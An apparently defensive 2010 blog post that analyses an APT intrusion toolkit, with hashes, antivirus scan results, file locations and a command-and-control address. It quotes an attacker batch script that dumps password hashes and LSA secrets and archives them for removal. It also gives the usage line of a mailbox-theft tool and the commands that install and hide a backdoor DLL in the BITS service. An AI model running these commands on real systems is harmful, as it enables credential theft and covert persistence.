While there can be any kind of file named wiam.exe, chances are that your file is similar or identical to the one described below. This file is part malware kind frequently referred to as APT malware. If you find this file on a system, look for others listed below. And yes, as you already guessed, you have a Problem.
According to Mandiant
"The Advanced Persistent Threat (APT) is a sophisticated and organized cyber attack to access and steal information from compromised computers. The intruders responsible for the APT attacks target the Defense Industrial Base (DIB), financial industry, manufacturing industry, and research industry. The attacks used by the APT intruders are not very different from any other intruder. The main differentiator is the APT intruder’s perseverance and resources. They have malicious code (malware) that circumvents common safeguards such as anti-virus and they tend to generate more activity than wanton “drive by hacks” on the Internet. The intruders also escalate their tools and techniques as a victim firm’s capability to respond improves. Therefore, the APT attacks present different challenges than addressing common computer security breaches."
Download additional files mentioned in the update July 16, 2010
Update: scroll down to see recent additions marked Update July 16, 2010
1. wiam.exe + iam.dll
The file itself is not really a trojan but a cli tool, part of the
modified pass-the-hash toolkit (PSH toolkit) released by Core
Technologies."The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes (YES, PASS-THE-HASH on Windows!)" See Modifying Windows NT Logon Credential
PSH original toolkit files
File: iam.exe Size: 90112 MD5: 1FF020D6F41CBF73ADF3AF2DE9A08CFD
File: iamdll.dll Size: 49152 MD5: DAB43935D17725024CC5EF2DD35CBEDD
http://www.virustotal.com/analisis/8f1f0eb6927d8eb331b36f2f5d0c7b434e2473332dea4acde1d6e96fd758731a-1275930386
File iam.exe received on 2010.06.07 17:06:26 (UTC)
Result: 5/41 (12.2%)
Authentium 5.2.0.5 2010.06.07 W32/Heuristic-KPP!Eldorado
F-Prot 4.6.0.103 2010.06.07 W32/Heuristic-KPP!Eldorado
Panda 10.0.2.7 2010.06.06 Suspicious file
PCTools 7.0.3.5 2010.06.07 Hacktool.PTHToolkit
Symantec 20101.1.0.89 2010.06.07 Hacktool.PTHToolkit
File size: 90112 bytes
MD5...: 1ff020d6f41cbf73adf3af2de9a08cfd
File iamdll.dll received on 2010.06.07 17:26:26 (UTC)
http://www.virustotal.com/analisis/16f480fcb042e07d89f2a384b52bfce9716c114b374bc8f81a95386651585b65-1275931586
Result: 0/41 (0%)
Additional information
File size: 49152 bytes
MD5...: dab43935d17725024cc5ef2dd35cbedd
=============================
Modified kit
File: wiam.exe Size: 40960 MD5: F49CB9A7006FB34E5B5A81AE32358C77
File: iam.dll Size: 36864 MD5: 30D50F856EFE9BCF7D0A859154CB2F92
http://www.virustotal.com/analisis/bc1c5911eb56fd92bb36507e694ee0629cf114c4ba2729c49b1cd3973e44c125-1275930460
File wiam.exe received on 2010.06.07 17:07:40 (UTC)
Result: 22/41 (53.66%)
a-squared 5.0.0.26 2010.06.07 Trojan.Hijacker!IK
AhnLab-V3 2010.06.06.00 2010.06.06 Malware/Win32.Trojan Horse
AntiVir 8.2.2.6 2010.06.07 TR/Hijacker.Gen
Authentium 5.2.0.5 2010.06.07 W32/Heuristic-KPP!Eldorado
Avast 4.8.1351.0 2010.06.07 Win32:Trojan-gen
Avast5 5.0.332.0 2010.06.07 Win32:Trojan-gen
BitDefender 7.2 2010.06.07 Application.Generic.248976
CAT-QuickHeal 10.00 2010.06.07 Trojan.Agent.ATV
Comodo 5019 2010.06.07 UnclassifiedMalware
eSafe 7.0.17.0 2010.06.06 Win32.TRHijacker
F-Prot 4.6.0.103 2010.06.07 W32/Heuristic-KPP!Eldorado
F-Secure 9.0.15370.0 2010.06.07 Application.Generic.248976
GData 21 2010.06.07 Application.Generic.248976
Ikarus T3.1.1.84.0 2010.06.07 Trojan.Hijacker
McAfee 5.400.0.1158 2010.06.07 Generic.dx!mfu
McAfee-GW-Edition 2010.1 2010.06.07 Generic.dx!mfu
NOD32 5180 2010.06.07 probably a variant of Win32/Agent
Panda 10.0.2.7 2010.06.06 Trj/CI.A
PCTools 7.0.3.5 2010.06.07 Trojan.Generic
Sunbelt 6416 2010.06.07 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.06.07 Trojan Horse
VirusBuster 5.0.27.0 2010.06.07 Trojan.Hijacker.BUO
Additional information
File size: 40960 bytes
MD5...: f49cb9a7006fb34e5b5a81ae32358c77
File iam.dll received on 2010.06.07 17:22:42 (UTC)
Result: 0/41 (0%)
Additional information
File size: 36864 bytes
MD5...: 30d50f856efe9bcf7d0a859154cb2f92
You can compare them in a hex editor, the files are not identical but here are similarities in the strings.
iam.exe file from Core
wiam.exe strings (partial, just for comparison)
The files can be found in various subdirectories of
\%userprofle%\local settings\temp
C:\windows\ime\imejp
C:\windows\system32
C:\windows\system32\temp\
If your attackers are sloppy or if you run data recovery/unerase/unformat tools on the affected machine, you may find other tools and files associated with this type of attack.
2. DumpExt.dll, DumpSvc.exe, PWDumpX.exe
PWDumpX v1.4 - Dumps domain password cache, LSA secrets, password hashes, and password history hashes.I don't think these files require much analysis, they are part of a well known password stealing application and the results are needed for pass-the-hash exercises described above
3. m.exe
Update: July 16, 2010.
You may see MAPI.EXE as a variant, which does the same thing (see download link in the beginning of this post)
VT 0/42
File size: 227840 bytes
MD5 : c57902ace7ff4173ae41f1292ea85e2a
http://www.virustotal.com/analisis/7a85131da877ac43d85315bd736783ebc62ba41625275efc6ee1ee3a1f60f7fd-1278304255MD5 : c57902ace7ff4173ae41f1292ea85e2a
m.exe is a file you may find together with the files listed. This file might be a standalone creation or a derivative of getmail (many thanks to JM for the tip). See the strings below for comparison.
Once user credentials are changed using the psh toolkit described above (wiam.exe+iam.dll), m.exe cli tool can be used to retrieve email messages of the target from an Exchange server. The usage is the following:
Example:%s -s:sn-server1.mailserver.com -u:exuser4 -t:2006-9-25-14 -o:c:\winnt\temp %s -s:ExchangeServer -u:UserName -t:YYYY-MM-DD-HH -o:SavePath
One needs to specify user name, server name, date range and location where to save the stolen data.
The email messages will be converted to text and attachments saved in corresponding subfolders. See examples below.
The message formatting will look like this:From:Jon DoeUntil very recently it was 0/41 on VT but now it is 1/41
To:Jane Smith
Subject:RE: Meeting
Recv Time:08/05/2009 08:27 PM
Hi Jane,
Thanks so much but I will not be able to attend the meeting.
Best,
Jon
________________________________
From: Jane Smith [mailto:JSmith@company.com]
Sent: Tuesday, August 04, 2009 10:43 AM
To: Jon Doe
Subject: Meeting
Jon, can you join us for the meeting tomorrow?
Thanks
Jane
http://www.virustotal.com/analisis/2903e1865777479f326757ce227711b149a3b893698ec0ad34e3ed0ae3761cc5-1275934263
File m.exe received on 2010.06.07 18:11:03 (UTC)
Result: 1/41 (2.44%)
McAfee-GW-Edition 2010.1 2010.06.07 Heuristic.BehavesLike.Win32.Backdoor.H
Additional information
File size: 215552 bytes
MD5...: 09e25bb934d8523fccd27b86fbf4f8ce
m.exe strings
getmail.exe strings
4.r.exe or ntfre.exe or any name
The tools get uploaded as an archive (archive be disguised as a temp file like ~WRD0204.tmp) and the stolen data needs to be compressed before it gets taken out, so there can be any kind of archiver involved These are two examples - same kind of cli WinRAR, just different names
(C) 1993-%d Alexander Roshal
beta
Usage: rar- -
Usage: unrar- -
<@listfiles...>
a Add files to archive
File ntfre.exe received on 2010.06.07 18:28:41 (UTC)
http://www.virustotal.com/analisis/1616612517d98e780666efd5b69b9ac5e94e34a661252198c88f0a2cf589792f-1275935321
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
Result: 1/41 (2.44%)
eSafe 7.0.17.0 2010.06.06 Win32.Banker - not really but they use these in banks too, I am sure (M)
Additional information
File size: 332800 bytes
MD5...: c7e858e4a51ba7d26af9235064988274
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
Result: 1/41 (2.44%)
eSafe 7.0.17.0 2010.06.06 Win32.Banker - not really but they use these in banks too, I am sure (M)
Additional information
File size: 332800 bytes
MD5...: c7e858e4a51ba7d26af9235064988274
r.exe is the same MD5 c7e858e4a51ba7d26af9235064988274
5. Batch files to automate the process.
There can be any variety of batch files, their content depends how much typing they don't want to do. Here is an example of a password hash stealing processHere is an example for pp.bat
cd C:\windows\ime\imejp
ntfre e -p64740629 ~WRD0203.tmp (uncompress ~WRD0203.tmp archive using password 64740629)
del ~WRD0203.tmp (delete the archive)
PWDumpX.exe 127.0.0.1 + + (dump password hash)
del DumpExt.dll
del DumpSvc.exe
del PWDumpX.exe
del 127.0.0.1-LSASecrets.txt
del 127.0.0.1-PWCache.txt
ntfre.exe a -r -s -m3 -inul -ep1 -n*.txt -hphappyday C:\windows\ime\imejp\~WRD001.tmp C:\windows\ime\imejp
del 127.0.0.1-PWHashes.txt
del ntfre.exe
net use \\127.0.0.1\ipc$ /del
del pp.bat
ntfre.exe a
-r -s -m3 -inul -ep1 -n*.txt -hphappyday C:\windows\ime\imejp\~WRD001. tmp
C:\windows\ime\imejp
means the following:
-r - add files to archive with all
subdirectories
-m3 - set compression method 3 , which is default (5 is
max)
-inul - means suppress messages
ep1
-- means exclude bvase dir name from names
n* -
Uhm, something about specified files not sure
-hphappyday - set this as archive password
6. Backdoor services and files for their installation.
- there are
MANY types of services that get modified to serve as backdoors by replacing the legitimate library. I posted a few recent examples before and and I will post more but now I will give one example.
s.exe
some strings
GetStartupInfoA
cmd /c attrib +h +s qmqrprxy.dll
cmd /c net start bits
cmd /c net stop bits
cmd /c rundll32 qmqrprxy.dll,RundllInstall
qmqrprxy.dll
cmd /c del.bat
del %s
del %s /as
ping 127.0.0.1 -n 3
del.bat
Update July 16, 2010
Here is a nice recent example for a backdoor service (legitimate library file for a non-essential service gets replaced with a malicious file)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\IAS]
"DisplayName"="Authentication Service"
"ObjectName"="LocalSystem"
"Description"="Enables authentication,authorization and accounting of dial-up and VPN users.IAS support the RADIVS protocol"
"ObjectName"="LocalSystem"
"Description"="Enables authentication,authorization and accounting of dial-up and VPN users.IAS support the RADIVS protocol"
replaced with ias.dll
File iass.dll received on 2010.07.05 04:11:40 (UTC)
http://www.virustotal.com/analisis/bfaedcb770769f0063a15a429f9e68c12fe0b5e4d13d1850a31c32a1177fb3b1-1278303100File iass.dll received on 2010.07.05 04:11:40 (UTC)
Result: 18/41 (43.90%)
a-squared 5.0.0.31 2010.07.05 Packer.RLPack!IK
AntiVir 8.2.4.2 2010.07.04 TR/Crypt.XPACK.Gen
Authentium 5.2.0.5 2010.07.04 W32/RLPacked.A.gen!Eldorado
Avast 4.8.1351.0 2010.07.04 Win32:Malware-gen
Avast5 5.0.332.0 2010.07.04 Win32:Malware-gen
AVG 9.0.0.836 2010.07.04 BackDoor.Generic12.BLMD
BitDefender 7.2 2010.07.05 Gen:Packer.RLPack.D.ai5aaiqnctm
Comodo 5321 2010.07.05 Heur.Pck.RLPack
F-Prot 4.6.1.107 2010.07.04 W32/RLPacked.A.gen!Eldorado
F-Secure 9.0.15370.0 2010.07.05 Gen:Packer.RLPack.D.ai5aaiqnctm
GData 21 2010.07.05 Gen:Packer.RLPack.D.ai5aaiqnctm
Ikarus T3.1.1.84.0 2010.07.05 Packer.RLPack
McAfee-GW-Edition 2010.1 2010.07.04 Heuristic.LooksLike.Win32.Suspicious.C
Microsoft 1.5902 2010.07.03 Backdoor:Win32/Pingbed.A
nProtect 2010-07-04.02 2010.07.04 Gen:Packer.RLPack.D.ai5aaiqnctm
Panda 10.0.2.7 2010.07.04 Suspicious file
Sophos 4.54.0 2010.07.05 Sus/Encpk-MV
TrendMicro 9.120.0.1004 2010.07.05 PAK_Generic.001
Additional information
File size: 16048 bytes
MD5 : 426f6471b612cf7bb32130fee94cf4c3
Other example of a backdoor file, which does not run as a service. It runs as a separate process and with the same name ccapp.exe, which is a name of Symantec/Norton Antivirus’ real-time scanner.
ccapp.exe 19/41 FFA85CB60C3572198A520B866FAE8B15
File ccapp.exe received on 2010.07.05 04:26:40 (UTC)
Result: 19/41 (46.34%)
AhnLab-V3 2010.07.03.00 2010.07.03 Win32/MalPackedB.suspicious
AntiVir 8.2.4.2 2010.07.04 TR/Crypt.ZPACK.Gen
Authentium 5.2.0.5 2010.07.04 W32/Fujack.U
Avast 4.8.1351.0 2010.07.04 Win32:Malware-gen
Avast5 5.0.332.0 2010.07.04 Win32:Malware-gen
AVG 9.0.0.836 2010.07.04 Win32/Virut.Z
BitDefender 7.2 2010.07.05 Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
Comodo 5321 2010.07.05 TrojWare.Win32.TrojanSpy.KeyLogger.~d02
F-Prot 4.6.1.107 2010.07.04 W32/Fujack.U
F-Secure 9.0.15370.0 2010.07.05 Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
GData 21 2010.07.05 Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
Microsoft 1.5902 2010.07.03 Backdoor:Win32/Pingbed.A
Norman 6.05.10 2010.07.04 Fujack.T
nProtect 2010-07-04.02 2010.07.04 Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
Panda 10.0.2.7 2010.07.04 Suspicious file
Sunbelt 6544 2010.07.05 Trojan.Crypt.AntiSig.b (v)
Symantec 20101.1.0.89 2010.07.05 Suspicious.MH690.A
ViRobot 2010.7.3.3920 2010.07.04 Backdoor.Win32.IRCBot.35288
VirusBuster 5.0.27.0 2010.07.04 Packed/RLPack
Additional information
File size: 14257 bytes
MD5 : ffa85cb60c3572198a520b866fae8b15
Result: 19/41 (46.34%)
AhnLab-V3 2010.07.03.00 2010.07.03 Win32/MalPackedB.suspicious
AntiVir 8.2.4.2 2010.07.04 TR/Crypt.ZPACK.Gen
Authentium 5.2.0.5 2010.07.04 W32/Fujack.U
Avast 4.8.1351.0 2010.07.04 Win32:Malware-gen
Avast5 5.0.332.0 2010.07.04 Win32:Malware-gen
AVG 9.0.0.836 2010.07.04 Win32/Virut.Z
BitDefender 7.2 2010.07.05 Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
Comodo 5321 2010.07.05 TrojWare.Win32.TrojanSpy.KeyLogger.~d02
F-Prot 4.6.1.107 2010.07.04 W32/Fujack.U
F-Secure 9.0.15370.0 2010.07.05 Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
GData 21 2010.07.05 Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
Microsoft 1.5902 2010.07.03 Backdoor:Win32/Pingbed.A
Norman 6.05.10 2010.07.04 Fujack.T
nProtect 2010-07-04.02 2010.07.04 Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
Panda 10.0.2.7 2010.07.04 Suspicious file
Sunbelt 6544 2010.07.05 Trojan.Crypt.AntiSig.b (v)
Symantec 20101.1.0.89 2010.07.05 Suspicious.MH690.A
ViRobot 2010.7.3.3920 2010.07.04 Backdoor.Win32.IRCBot.35288
VirusBuster 5.0.27.0 2010.07.04 Packed/RLPack
Additional information
File size: 14257 bytes
MD5 : ffa85cb60c3572198a520b866fae8b15
------------------------ end of July 16, 2010 update-------------------------
qmqr.dll or qmqrprxy.dll
C:\WINDOWS\system32\qmqrprxy. dll
(32768 Bytes.) - qmqrprxy.dll to
replace legitimate BITs service file qmgr.dll - in
HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Services\ BITS\Parameters
Command
sequence:
creates
C:\del.bat (56 Bytes.)
installs
cmd /c rundll32
qmqrprxy.dll,RundllInstall
restarts BITS
cmd /c net stop bits
cmd /c net start bits
sets attribute to
system hidden
cmd /c attrib +h +s qmqrprxy.dll
cmd /c del.bat -
deletes the batch file
BITS firewall bypass - backdoor - see explanation here New Attack Piggybacks on Microsoft's Patch Service or here Обход фаеров с использованием BITS
TCP traffic 58.33.154.102:443
Hostname: 102.154.33.58.broad.xw.sh.dynamic.163data.com.cn
ISP: ChinaNet Shanghai Province Network
Organization: ChinaNet Shanghai Province Network
Country: China
State/Region: Shanghai
ISP: ChinaNet Shanghai Province Network
Organization: ChinaNet Shanghai Province Network
Country: China
State/Region: Shanghai
File qmqrprxy.dll received on 2010.06.07 20:28:13 (UTC) - originally was 2/41 on VT
http://www.virustotal.com/analisis/a48c83859d3430c6fc5606ba8da4c38353cb1a93cb01e7f53e3122600147cc26-1275942493
Result: 25/41 (60.98%)
a-squared 5.0.0.26 2010.06.07 Trojan-Downloader.Win32.Small!IK
AhnLab-V3 2010.06.06.00 2010.06.06 Win-Trojan/Atraps.32768.N
AntiVir 8.2.2.6 2010.06.07 TR/ATRAPS.Gen
Avast 4.8.1351.0 2010.06.07 Win32:Malware-gen
Avast5 5.0.332.0 2010.06.07 Win32:Malware-gen
AVG 9.0.0.787 2010.06.07 BackDoor.Generic12.KBM
BitDefender 7.2 2010.06.07 Trojan.Generic.2664831
CAT-QuickHeal 10.00 2010.06.07 Trojan.Agent.ATV
Comodo 5020 2010.06.07 TrojWare.Win32.GameThief.Nilage.~CRSH
F-Secure 9.0.15370.0 2010.06.07 Trojan.Generic.2664831
GData 21 2010.06.07 Trojan.Generic.2664831
Ikarus T3.1.1.84.0 2010.06.07 Trojan-Downloader.Win32.Small
Kaspersky 7.0.0.125 2010.06.07 Backdoor.Win32.Small.iog
McAfee-GW-Edition 2010.1 2010.06.07 Heuristic.BehavesLike.Win32.Downloader.H
Microsoft 1.5802 2010.06.07 TrojanDownloader:Win32/Troxen!rts
NOD32 5180 2010.06.07 a variant of Win32/Agent.WQS
Norman 6.04.12 2010.06.07 W32/Atraps.EZM
nProtect 2010-06-07.01 2010.06.07 Trojan.Generic.2664831
Panda 10.0.2.7 2010.06.07 Trj/CI.A
PCTools 7.0.3.5 2010.06.07 Trojan.ADH
Prevx 3.0 2010.06.07 High Risk Worm
Sunbelt 6416 2010.06.07 Trojan.Win32.Small
Symantec 20101.1.0.89 2010.06.07 Trojan.ADH
TrendMicro 9.120.0.1004 2010.06.07 BKDR_SMALL.LOP
TrendMicro-HouseCall 9.120.0.1004 2010.06.07 BKDR_SMALL.LOP
Additional information
File size: 32768 bytes
Result: 25/41 (60.98%)
a-squared 5.0.0.26 2010.06.07 Trojan-Downloader.Win32.Small!IK
AhnLab-V3 2010.06.06.00 2010.06.06 Win-Trojan/Atraps.32768.N
AntiVir 8.2.2.6 2010.06.07 TR/ATRAPS.Gen
Avast 4.8.1351.0 2010.06.07 Win32:Malware-gen
Avast5 5.0.332.0 2010.06.07 Win32:Malware-gen
AVG 9.0.0.787 2010.06.07 BackDoor.Generic12.KBM
BitDefender 7.2 2010.06.07 Trojan.Generic.2664831
CAT-QuickHeal 10.00 2010.06.07 Trojan.Agent.ATV
Comodo 5020 2010.06.07 TrojWare.Win32.GameThief.Nilage.~CRSH
F-Secure 9.0.15370.0 2010.06.07 Trojan.Generic.2664831
GData 21 2010.06.07 Trojan.Generic.2664831
Ikarus T3.1.1.84.0 2010.06.07 Trojan-Downloader.Win32.Small
Kaspersky 7.0.0.125 2010.06.07 Backdoor.Win32.Small.iog
McAfee-GW-Edition 2010.1 2010.06.07 Heuristic.BehavesLike.Win32.Downloader.H
Microsoft 1.5802 2010.06.07 TrojanDownloader:Win32/Troxen!rts
NOD32 5180 2010.06.07 a variant of Win32/Agent.WQS
Norman 6.04.12 2010.06.07 W32/Atraps.EZM
nProtect 2010-06-07.01 2010.06.07 Trojan.Generic.2664831
Panda 10.0.2.7 2010.06.07 Trj/CI.A
PCTools 7.0.3.5 2010.06.07 Trojan.ADH
Prevx 3.0 2010.06.07 High Risk Worm
Sunbelt 6416 2010.06.07 Trojan.Win32.Small
Symantec 20101.1.0.89 2010.06.07 Trojan.ADH
TrendMicro 9.120.0.1004 2010.06.07 BKDR_SMALL.LOP
TrendMicro-HouseCall 9.120.0.1004 2010.06.07 BKDR_SMALL.LOP
Additional information
File size: 32768 bytes
MD5...: 03b3cceb253fd782590cf0efafd49d5f
There can be a few other files as well, this is a basic pack that is needed to pull it off. I will be adding more files related to this type of attack and other APT malware but feel free to email me if you have questions or comments.
No comments:
Post a Comment